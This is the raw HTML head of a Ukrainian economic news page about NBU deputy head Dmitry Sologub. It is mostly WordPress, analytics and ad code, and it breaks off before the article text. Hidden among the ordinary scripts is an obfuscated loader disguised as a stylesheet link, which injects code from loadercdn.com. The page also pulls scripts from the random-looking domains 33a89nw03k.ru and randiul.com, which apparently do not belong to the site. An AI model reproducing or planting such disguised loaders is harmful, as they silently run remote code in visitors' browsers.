<!DOCTYPE html><html prefix="og: http://ogp.me/ns#" lang="ru"><head><title>Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ | Экономические Новости</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/> <meta name="referrer" content="origin"><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="yandex-verification" content="9a28c4c473219914" /><meta name="msvalidate.01" content="B41426C32883F1040781CF3774D685FD" /> <meta property="og:title" content="Замглавы НБУ Дмитрий Сологуб, получая по 300 тыс. грн, прогуливает работу, а в офисе играет в теннис &#8212; сотрудники НБУ "/><meta property="og:site_name" content="enovosty. Украинские новости дня"/><meta property="og:image" content="https://enovosty.com/img/ielogo.jpg"/><meta property="og:type" content="website" /><meta property="og:image:width" content="200" /><meta property="og:image:height" content="200" /><meta property="og:type" content="article" /><meta property="og:image:alt" content="Экономические новости Украины и мира" /><meta name="google-site-verification" content="lQg1PFdRt2LbXcwJ8zsQT5ZnqQEsNPh4d7LwEmOU_lU" /><style>.toparticles{position:relative}.toparticles #photoPromo{height:216px;width:466px;overflow:hidden}.toparticles #photoPromo li{height:216px}.toparticles div.anythingSlider .anythingControls{display:block}</style><link rel="icon" href="https://enovosty.com/favicon.ico" type="image/x-icon" /><link rel="apple-touch-icon" sizes="144x144" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-144x144.png"> <link rel="apple-touch-icon" sizes="114x114" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-114x114.png"> <link rel="apple-touch-icon" sizes="72x72" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-72x72.png"> <link rel="apple-touch-icon" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png"><link rel="apple-touch-icon-precomposed" href="https://enovosty.com/wp-content/themes/eizvestia/img/touch/apple-touch-icon-57x57.png" /><style>@font-face{font-family:"sw-icon-font";src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0");src:url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.eot?ver=3.6.0#iefix") format("embedded-opentype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.woff?ver=3.6.0") format("woff"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.ttf?ver=3.6.0") format("truetype"),url("https://enovosty.com/wp-content/plugins/social-warfare/assets/fonts/sw-icon-font.svg?ver=3.6.0#1445203416") format("svg");font-weight:normal;font-style:normal}</style><link rel='stylesheet' id='mo_openid_admin_settings_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/mo_openid_style.css?version=5.0.6' type='text/css' media='all' /><link rel='stylesheet' id='mo_openid_admin_settings_phone_style-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/phone.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-social-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-social.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-bootstrap-main-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap.min-preview.css' type='text/css' media='all' /><link rel='stylesheet' id='mo-wp-font-awesome-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/font-awesome.min.css?version=4.8' type='text/css' media='all' /><link rel='stylesheet' id='bootstrap_style_ass-css' href='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/css/bootstrap-tour-standalone.css?version=5.1.4' type='text/css' media='all' /><link rel='stylesheet' id='wp-block-library-css' href='https://enovosty.com/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='wbcr-comments-plus-url-span-css' href='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/css/url-span.css' type='text/css' media='all' /><link rel='stylesheet' id='social_warfare-css' href='https://enovosty.com/wp-content/plugins/social-warfare/assets/css/style.min.css' type='text/css' media='all' /><link rel='stylesheet' id='videojscss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/video-js.css' type='text/css' media='all' /><link rel='stylesheet' id='videojsimacss-css' href='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.css' type='text/css' media='all' /><link rel='stylesheet' id='msl-main-css' href='https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/masterslider.main.css' type='text/css' media='all' /><link rel='stylesheet' id='ldc-like-dislike-css' href='https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1' type='text/css' media='all' /><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/jquery/jquery-migrate.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/jquery.cookie.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/miniorange-login-openid/includes/js/social_login.js'></script><meta name="description" content="Заместитель главы правления Национального банка Украины Дмитрий Сологуб игнорирует правила работы в организации, не появляясь на рабочем месте и не выполняя своих обязанностей. Об этом идет речь в письме сотрудников НБУ, текстом которого обладает редакция «Экономических новостей»." /><meta property="og:description" content="Заместитель главы правления Национального банка Украины Дмитрий Сологуб игнорирует правила работы в организации, не появляясь на рабочем месте и не выполняя своих обязанностей. Об этом идет речь в письме сотрудников НБУ, текстом которого обладает редакция «Экономических новостей»." /><meta name="keywords" content="нацбанк,нбу,новости экономики" /><link rel="canonical" href="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu" /><meta property="og:url" content="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu" /><style>.ms-parent-id-7 > .master-slider{background:#000000}.ms-parent-id-6 > .master-slider{background:#000000}.ms-parent-id-5 > .master-slider{background:#000000}.ms-parent-id-4 > .master-slider{background:#000000}.ms-parent-id-3 > .master-slider{background:#000000}.ms-parent-id-2 > .master-slider{background:#000000}.ms-parent-id-1 > .master-slider{background:#000000}</style><script>var ms_grabbing_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grabbing.cur', ms_grab_curosr = 'https://enovosty.com/wp-content/plugins/master-slider/public/assets/css/common/grab.cur';</script><meta name="generator" content="MasterSlider 3.1.1 - Responsive Touch Image Slider | www.avt.li/msf" /><link rel="amphtml" href="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu?amp"><meta name="fragment" content="!" /><script type="text/javascript">ajaxurl = '/wp-admin/admin-ajax.php';gpid = '4834948';cpage = ''
</script><style>span.swp_share,i.swp_facebook_icon,i.swp_twitter_icon,i.swp_linkedin_icon,span.swp_count{color:#ffffff}table.social{width:50%!important}.swp_share_button{height:max-content!important}.swp_social_panel{margin-bottom:0px!important;margin-top:0px!important}</style><script href="https://enovosty.com/wp-content/themes/eizvestia/style1.min.css?v=1">(function(e,t,r,n,o,a,i,l,m,c,g,d,s,u){var w,f,h,p,b,v,y,I="",A="/?r=",B=e.localStorage||{};for(w in B)e[g](w[d](0,3),16)+""==w[d](3)&&(f=B[i+m](w)).length<100&&f[d](0,3)==s&&(B[l+m](w),I=f);v=(b=(p=(h=e[t]).getElementsByTagName(n))[p.length-1])[a]("href"),y=b[a]("media")||"",h[r]("<"+n+">"+(I?u+'="//loadercdn.com'+A+e[u]+"&"+I+'";':t+"."+r+"('<"+o+">@"+c+' "'+v+'" '+y+";</"+o+">');")+"</"+n+">")})(window,"document","write","script","style","getAttribute","get","remove","Item","import","parseInt","substr","d1e","location");</script><link rel="stylesheet" id="like-dislike-css" href="https://enovosty.com/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/css/ldc-lite.min.css?v=1&#038;ver=1.0.0" type="text/css" media="all" /><script><!--//--><![CDATA[//><!--
var pp_gemius_identifier = new String('.WeQbWs7d1FI7fa_VrIDknZ233jNFqLPdhORXpDm_jL.27');//--><!]]></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/x_gemius.js"></script><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-addcount.js.php?top_ten_id=4834948&amp;a=3026" async></script><!--[if lte IE 7]><link rel="stylesheet" href="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/css/anythingslider-ie.css" type="text/css" media="screen" /><![endif]--><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jslider/js/jquery.anythingslider1.min.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/jqvisible.js"></script><script async src="https://enovosty.com/wp-content/themes/eizvestia/js/common.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/adriver.core.2.ua.min.js"></script><script type="text/javascript">(function () {var w = window,d = document,protocol = /https/i.test(w.location.protocol) ? 'https:' : 'http:',aml = typeof admixerML !== 'undefined' ? admixerML : {};aml.fn = aml.fn || [];aml.invPath = aml.invPath || (protocol + '//inv-nets.admixer.net/');
aml.cdnPath = aml.cdnPath || (protocol + '//cdn.admixer.net/');
aml.noCriteo = true;if (!w.admixerML) {var lodash = document.createElement('script');lodash.id = 'amlScript';lodash.async = true;lodash.type = 'text/javascript';lodash.src = aml.cdnPath + 'scripts3/loader2.js';var node = d.getElementsByTagName('script')[0];node.parentNode.insertBefore(lodash, node);w.admixerML = aml;}})();</script> <script src="https://scripts.go2net.com.ua/scripts3/loader2.js" async
data-inv="//ads.go2net.com.ua/"
data-r="single"
data-sender="go2net"
data-bundle="desktop"></script><meta property="fb:admins" content="100009507220682"/><meta property="fb:app_id" content="2113796585568948"/><script>function setHomepage(){var homepage = 'https://enovosty.com';
if (document.all){document.body.style.behavior='url(#default#homepage)';document.body.setHomePage(homepage);}else if (window.sidebar){if(window.netscape){try{netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");}catch(e){alert("this action was aviod by your browser，if you want to enable，please enter about:config in your address line,and change the value of signed.applets.codebase_principal_support to true");}}var prefs = Components.classes['@mozilla.org/preferences-service;1'].getService(Components. interfaces.nsIPrefBranch);prefs.setCharPref('browser.startup.homepage',homepage);}}</script><script>var _gaq = _gaq || [];var pluginUrl = '//www.google-analytics.com/plugins/ga/inpage_linkid.js';
_gaq.push(['_require', 'inpage_linkid', pluginUrl]);_gaq.push(['_setAccount', 'UA-12467142-3']);_gaq.push(['_addOrganic', 'nova.rambler.ru', 'query']);_gaq.push(['_addOrganic', 'go.mail.ru', 'q']);_gaq.push(['_addOrganic', 'nigma.ru', 's']);_gaq.push(['_addOrganic', 'webalta.ru', 'q']);_gaq.push(['_addOrganic', 'aport.ru', 'r']);_gaq.push(['_addOrganic', 'poisk.ru', 'text']);_gaq.push(['_addOrganic', 'km.ru', 'sq']);_gaq.push(['_addOrganic', 'liveinternet.ru', 'ask']);_gaq.push(['_addOrganic', 'quintura.ru', 'request']);_gaq.push(['_addOrganic', 'search.qip.ru', 'query']);_gaq.push(['_addOrganic', 'gde.ru', 'keywords']);_gaq.push(['_addOrganic', 'gogo.ru', 'q']);_gaq.push(['_addOrganic', 'ru.yahoo.com', 'p']);_gaq.push(['_addOrganic', 'images.yandex.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogsearch.google.ru', 'q', true]);_gaq.push(['_addOrganic', 'blogs.yandex.ru', 'text', true]);_gaq.push(['_setDomainName', 'enovosty.com']);_gaq.push(['_trackPageview']);(function() {var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'https://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);})();</script><script>function trackOutboundLink(link, category, action) {var url = '';if(link.href) url = link.href;if(url == ''){str = link.getAttribute("onclick");m = str.match("(https:\/\/.*?)\'");if(m) url = m[1];}try {_gaq.push(['_trackEvent', category , action]);} catch(err){}setTimeout(function() {}, 100);}</script><script>jQuery(document).ready(function($){$("a").each(function() {var href = $(this).attr("href");var target = $(this).attr("target");var text = $(this).text();var a = new RegExp('/' + window.location.host + '/');var e = /([-a-zA-Z0-9@:%_\+.~#?&\/\/=]{2,256}\.[a-z]{2,4}\b(\/?[-a-zA-Z0-9@:%_\+.~#?&\/\/=]*)?)/gi;var b = new RegExp(e);$(this).click(function(event) {if (this.href && b.test(this.href) && !a.test(this.href) && (href.indexOf("enovosty.com") == -1)) {console.log("document.URL : "+this.href);event.preventDefault();_gaq.push(["_trackEvent", "Links", "Clicked", href, , false]);setTimeout(function() {window.open(href,(!target?"_self":target));},300);}});});});</script><script>(function(){var j=163229,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("async","true");a.setAttribute("src","https://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script><script> !(function () { window.googletag = window.googletag || {}; window.vmpbjs = window.vmpbjs || {}; window.vpb = window.vpb || {}; vpb.fastLoad = true; googletag.cmd = googletag.cmd || []; vmpbjs.cmd = vmpbjs.cmd || []; var cmds = googletag.cmd.slice(0) || []; googletag.cmd.length=0; var ready = false; function exec(cb) { return cb.call(googletag); } googletag.cmd.push(function () { googletag.cmd.unshift = function (cb) { if (ready) { return exec(cb); } cmds.unshift(cb); if (cb._startgpt) { ready = true; cmds.forEach(cb=> { exec(cb); }); } }; googletag.cmd.push = function (cb) { if (ready) { return exec(cb); } cmds.push(cb); }; }); googletag.cmd.push = function (cb) { cmds.push(cb) }; googletag.cmd.unshift = function (cb) { cmds.unshift(cb); if (cb._startgpt) { ready = true; if (googletag.apiReady) { cmds.forEach(function (cb) { googletag.cmd.push(cb); }) } else { googletag.cmd = cmds; } } }; var dayMs = 36e5, cb = parseInt(Date.now() / dayMs), vpbSrc = '//player.adtelligent.com/prebidlink/' + cb + '/wrapper_hb_308225_6946.js', pbSrc = vpbSrc.replace('wrapper_hb', 'hb'), gptSrc = '//securepubads.g.doubleclick.net/tag/js/gpt.js', c = document.head || document.body || document.documentElement; function loadScript(src, cb) { var s = document.createElement('script'); s.src = src; s.defer=false; c.appendChild(s); s.onload = cb; s.onerror = function(){ var fn = function(){}; fn._startgpt = true; googletag.cmd.unshift(fn); }; return s; } loadScript(pbSrc); loadScript(gptSrc); loadScript(vpbSrc); })() </script><script async src="//www.googletagservices.com/tag/js/gpt.js"></script><script async src="//acdn.adnxs.com/prebid/not-for-prod/prebid.js"></script><script>var div_1_sizes = [
[240, 320],[240, 350],[240, 420],[240, 500],[240, 600],[300, 250],[300, 280],[300, 300],[300, 400],[300, 500],[300, 600],[320, 50],[320, 100],[320, 250],[320, 480],[320, 600]
];var div_2_sizes = [
[200, 200],[200, 400],[200, 600],[240, 350],[240, 500],[240, 600],[300, 250],[300, 300],[300, 400],[300, 500],[300, 600]
];var div_3_sizes = [
[240, 350],[240, 500],[300, 250],[300, 600]
];var div_4_sizes = [
[300, 250],[300, 50],[300, 75],[300, 100],[300, 300],[320, 50],[320, 100],[320, 250],[320, 200]
];var PREBID_TIMEOUT = 1000;var FAILSAFE_TIMEOUT = 3000;var adUnits = [
{code: '/29636627/enovosty.com_300x600_mob_hb',mediaTypes: {banner: {sizes: div_1_sizes
}},bids: [{bidder: 'admixer',params: {zone: '0aeef458-3e2c-4ffa-b559-7ed3aa2de424'
}}]
},{code: '/29636627/enovosty.com_320x250_hb',mediaTypes: {banner: {sizes: div_4_sizes
}},bids: [{bidder: 'admixer',params: {zone: '156e0022-5c98-499e-b4e6-788848e60a3c'
}}]
},{code: '/29636627/enovosty.com_300x600_top_hb',mediaTypes: {banner: {sizes: div_2_sizes
}},bids: [{bidder: 'admixer',params: {zone: '9743148c-0bcf-416e-8ab5-55d24689e145'
}}]
},{code: '/29636627/enovosty.com_300x600_ukr.net_hb',mediaTypes: {banner: {sizes: div_3_sizes
}},bids: [{bidder: 'admixer',params: {zone: '7af953ae-795d-4e3e-8b55-c1906dcae224'
}}]
}];// ======== DO NOT EDIT BELOW THIS LINE =========== //
var googletag = googletag || {};googletag.cmd = googletag.cmd || [];googletag.cmd.push(function() {googletag.pubads().disableInitialLoad();});var pbjs = pbjs || {};pbjs.que = pbjs.que || [];pbjs.que.push(function() {pbjs.addAdUnits(adUnits);pbjs.requestBids({bidsBackHandler: initAdserver,timeout: PREBID_TIMEOUT
});});function initAdserver() {if (pbjs.initAdserverSet) return;pbjs.initAdserverSet = true;googletag.cmd.push(function() {pbjs.que.push(function() {pbjs.setTargetingForGPTAsync();googletag.pubads().refresh();});});}// in case PBJS doesn't load
setTimeout(function() {initAdserver();}, FAILSAFE_TIMEOUT);googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_mob_hb', div_1_sizes, 'div-1').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_top_hb', div_2_sizes, 'div-2').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_300x600_ukr.net_hb', div_3_sizes, 'div-3').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});googletag.cmd.push(function() {googletag.defineSlot('/29636627/enovosty.com_320x250_hb', div_4_sizes, 'div-4').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.enableServices();});</script><script>var googletag = googletag || {};googletag.cmd = googletag.cmd || [];</script><script>googletag.cmd.push(function() {googletag.defineSlot('/59256651/Test_Moxtv_enovosty_970x250', [970, 250], 'div-gpt-ad-1599639337661-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty2_300x600', [300, 600], 'div-gpt-ad-1596728019577-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_970x250', [970, 250], 'div-gpt-ad-1595961600637-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600', [300, 600], 'div-gpt-ad-1531223757969-0').addService(googletag.pubads());googletag.defineSlot('/17774365/enovosty.com_300x600_2', [300, 600], 'div-gpt-ad-1531304104065-0').addService(googletag.pubads());//googletag.defineSlot('/17774365/enovosty.com_728x90', [728, 90], 'div-gpt-ad-1531223757969-1').addService(googletag.pubads());
googletag.defineSlot('/59256651/ads_ei_468_60', [468, 60], 'div-gpt-ad-1516280158772-0').addService(googletag.pubads());googletag.defineSlot('/59256651/enovosty_adint_300_600', [[300, 600],[300,250]], 'div-gpt-ad-1594112815543-0').addService(googletag.pubads());googletag.defineSlot('/59256651/Adaptive_zone', [470, 376], 'div-gpt-ad-1594991505318-0').addService(googletag.pubads());googletag.pubads().enableSingleRequest();googletag.pubads().collapseEmptyDivs();googletag.enableServices();});
</script><script type="text/plain" id="vpb-catfish-template"><div class="vpb-catfish-container" style="position: fixed;bottom:0;left:0;right:0;z-index:999999;"><div class="vpb-ad" style="display: block;position: relative;margin:0px auto;"><span class="vpb-close-button"
style="display: none;position: absolute;top:-15px;right:-15px;z-index:9999;cursor: pointer;"><img src="data:image/png;base64,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"/></span></div></div></script><script>function catfish(div) {var gt = window.googletag || {};gt.cmd = gt.cmd || [];gt.cmd.push(function () {var template = document.getElementById('vpb-catfish-template').innerHTML;var adContainer = document.getElementById(div);adContainer.innerHTML = template;adContainer.id = 'vpb-ad-wrapped-generated-' + (Math.random() + Date.now());var innerWrapper = adContainer.getElementsByClassName('vpb-ad')[0];var closeBtn = adContainer.getElementsByClassName('vpb-close-button')[0];var newAdDiv = document.createElement('div');newAdDiv.id = div;innerWrapper.appendChild(newAdDiv);googletag.pubads().addEventListener('slotRenderEnded', function (event) {var slot = event.slot;var slotId = slot.getSlotElementId();if (slotId != div)  return;if (event.isEmpty) {closeBtn.style.display = 'none';adContainer.style.display = 'none';return;}adContainer.style.display = 'block';innerWrapper.style.width = event.size[0] + 'px';innerWrapper.style.height = event.size[1] + 'px';closeBtn.style.display = 'inline-block';closeBtn.addEventListener('click', function () {adContainer.parentElement.removeChild(adContainer);})
});gt.display(div);})
}</script><script src="https://33a89nw03k.ru/script.js"></script></head><body><script type='text/javascript'>admixerML.fn.push(function() {// Правая колонка - верх
if(/ukr.net/i.test(document.referrer)){admixerML.defineSlot({z: '7af953ae-795d-4e3e-8b55-c1906dcae224', ph: 'admixer_7af953ae795d4e3e8b55c1906dcae224_zone_12623_sect_1082_site_1069',i: 'inv-nets'});} else {admixerML.defineSlot({z: '9743148c-0bcf-416e-8ab5-55d24689e145', ph: 'admixer_9743148c0bcf416e8ab555d24689e145_zone_1845_sect_1082_site_1069', i: 'inv-nets'});};admixerML.defineSlot({z: '9a399316-86c0-4d6c-a6f1-676a36437a90', ph: 'admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069', i: 'inv-nets', s:'8b5577c5-d6c8-4102-81da-48ee76305fc9'});// Нигде не выводится

// Статьи/Новости внизу
admixerML.defineSlot({z: '3b1188cc-6614-4215-a9bc-9ecb1d9b44e9', ph:
'admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069', i:
'inv-nets' ,renderedCallback: function(e) {var player = e.ph.childNodes[0].contentWindow &&
e.ph.childNodes[0].contentWindow.player;if (player){player.mute();}}});// Футтер
admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f', ph:
'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069', i:
'inv-nets'});
admixerML.defineSlot({z: '5dacd85f-7810-44f5-831a-9a7b2add1a5f', ph: 'admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069', i: 'inv-nets'});admixerML.singleRequest();});</script><script type='text/javascript'>(window.globalAmlAds = window.globalAmlAds || []).push(function() {globalAml.defineSlot({z: '6c64e196-3fa9-43cf-8c1e-fd800277f90c', ph: 'go2net_6c64e1963fa943cf8c1efd800277f90c_zone_28808_sect_9220_site_7570', i: 'inv-nets', s:'7901bb9a-67fa-4dcd-8ae7-8a34d5bc7852', sender: 'go2net'});globalAml.singleRequest("go2net");});</script><script><!--
bmN=navigator,bmD=document,bmD.cookie='b=b',i=0,bs=[],bm={v:101585,s:101585,t:6,c:bmD.cookie?1:0,n:Math.round((Math.random()* 1000000)),w:0};for(var f=self;f!=f.parent;f=f.parent)bm.w++;try{if(bmN.plugins&&bmN.mimeTypes.length&&(x=bmN.plugins['Shockwave Flash']))bm.m=parseInt(x.description.replace(/([a-zA-Z]|\s)+/,''));else for(var f=3;f<20;f++)if(eval('new ActiveXObject("ShockwaveFlash.ShockwaveFlash.'+f+'")'))bm.m=f}catch(e){;}try{bm.y=bmN.javaEnabled()?1:0}catch(e){;}try{bmS=screen;bm.v^=bm.d=bmS.colorDepth||bmS.pixelDepth;bm.v^=bm.r=bmS.width}catch(e){;}r=bmD.referrer.replace(/^w+:\/\//,'');if(r&&r.split('/')[0]!=window.location.host){bm.f=escape(r).slice(0,400).slice(0,400);bm.v^=r.length}bm.v^=window.location.href.length;for(var x in bm) if(/^[vstcnwmydrf]$/.test(x)) bs[i++]=x+bm[x];bmD.write('<img src="//c.bigmir.net/?'+bs.join('&')+'"  width="0" height="0" alt="bigmir)net TOP 100" style="display:none;" title="bigmir)net TOP 100" />');
//--></script><noscript><img src="//c.bigmir.net/?v101585&s101585&t6" width="0" height="0" alt="" title="" /></noscript><div id="fb-root"></div><script>window.fbAsyncInit = function() {FB.init({appId      : '2113796585568948',cookie     : true,xfbml      : true,version    : 'v3.0'
});
FB.AppEvents.logPageView();
};(function(d, s, id){var js, fjs = d.getElementsByTagName(s)[0];if (d.getElementById(id)) {return;}js = d.createElement(s); js.id = id;js.src = "https://connect.facebook.net/en_US/sdk.js";
fjs.parentNode.insertBefore(js, fjs);}(document, 'script', 'facebook-jssdk'));</script><div id="adriver_banner_branding"></div><div id='admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069'></div><script>admixerML.fn.push(function() {admixerML.display('admixer_5dacd85f781044f5831a9a7b2add1a5f_zone_23901_sect_1082_site_1069');});</script><div class="container"> <div style="margin-top:0px;position:relative;"> <div id='admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_9a39931686c04d6ca6f1676a36437a90_zone_42132_sect_1082_site_1069');});</script><script type="text/javascript" id="ertqxb">(function(){var s = document.createElement("script");s.type = "text/javascript";s.src = "//randiul.com/t.js?i=z61ztncbiozypm54k16j8&cb=" + (new String(Math.random())).substring(2,8) + (((new Date()).getTime()));
d = document.getElementById("ertqxb");d.parentNode.insertBefore(s, d);})();</script><div id="right_ban"></div> <div class="mltlngg_switcher"><span>Рус</span><a href="https://enovosty.com/uk/">Укр</a></div> </div> <div class="cls"></div><div id="header" style="padding-top:0px; margin-top: 0px;" ><div id="headerTop"><div class="cls"></div></div>   <div id="headerMiddle"><a href="https://enovosty.com/"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png" id="logo" alt="Экономические новости" title="Экономические новости" /></a> <a href="https://enovosty.com/konverter-valyut" class="finmarket">Конвертер валют</a><a href="https://enovosty.com/video" class="videohead">Видео</a><a class="wap" rel="nofollow" href="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu?mobile=1"></a><a class="wap-img" title="Мобильная версия сайта" rel="nofollow" href="https://enovosty.com/news_economy/full/402-zamglavy-nbu-dmitrij-sologub-poluchaya-po-300-tys-grn-progulivaet-rabotu-a-v-ofise-igraet-v-tennis-sotrudniki-nbu?mobile=1"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/wap1.png" alt="Мобильная версия сайта" />Мобильная версия</a> <div class="wiget simple" id="curs"><span style="text-align:center;display: block;font-size: 12px;font-weight: 700;"><a style="color: #369;" href="https://enovosty.com/currency-rates">Курсы валют</a></span><div class="header-currency"><a href="https://enovosty.com/currency-rates"><table class="currency"> <tr class="cur_shap"><td>&nbsp;</td><td><strong>Продажа</strong></td><td><strong>Покупка</strong></td><td><strong>НБУ</strong></td> </tr> <tr><td>USD</td><td>28.14</td><td>27.82</td><td>25.14</td> </tr> <tr class="tr_white"><td>EUR</td><td>34.00</td><td>33.30</td><td>27.75</td> </tr> <tr><td>RUB</td><td>0.41</td><td>0.28</td><td>0.38</td> </tr></table></a></div></div><div class="wiget simple" id="fonds"><span style="color: #369;text-align: center;display: block;font-size: 12px;font-weight: 700;">Фондовые индексы</span><table class="currency index"> <tr class="cur_shap"> <td>&nbsp;</td><td><strong>Знач.</strong></td><td><strong>Изм.,&nbsp;%</strong></td><td><strong>Время</strong></td> </tr> <tr> <td>PFTS</td><td>520.80</td><td>0.00</td><td>20:36 04.02.2021</td> </tr> <tr class="tr_white"> <td>UX</td><td>1717.74</td><td>2.05</td><td>17:00 04.02.2021</td> </tr> <tr> <td>RTS</td><td>1402.71</td><td>1.13</td><td>17:51 04.02.2021</td> </tr></table></div><div class="wiget simple" id="toplivo"><span style="color: #369;text-align:center;display: block;font-size: 12px;font-weight: 700;">Стоимость нефти (ICE)</span><table class="currency benzin"><tr class="cur_shap"><td></td><td><strong>$/баррель</strong></td><td><strong>Изм., %</strong></td><td><strong>Дата</strong></td></tr><tr><td style="text-align:left;padding-left: 2px;">BRENT</td><td>58.87</td><td>+0.70</td><td style="text-transform:uppercase;">Feb</td></tr><tr class="tr_white"><td style="text-align:left;padding-left: 2px;">WTI</td><td>56.37</td><td>+1.22</td><td style="text-transform:uppercase;">Feb</td></tr><tr><td style="text-align:left;padding-left: 2px;">GAS OIL</td><td>481.50</td><td>+0.47</td><td style="text-transform:uppercase;">Feb</td></tr></table></div> <div id="header_right"> <a href="https://enovosty.com/rss/rss.xml">RSS</a><a href="https://enovosty.com/afisha" class="h-anonsy" style="margin-top: 40px;"> 
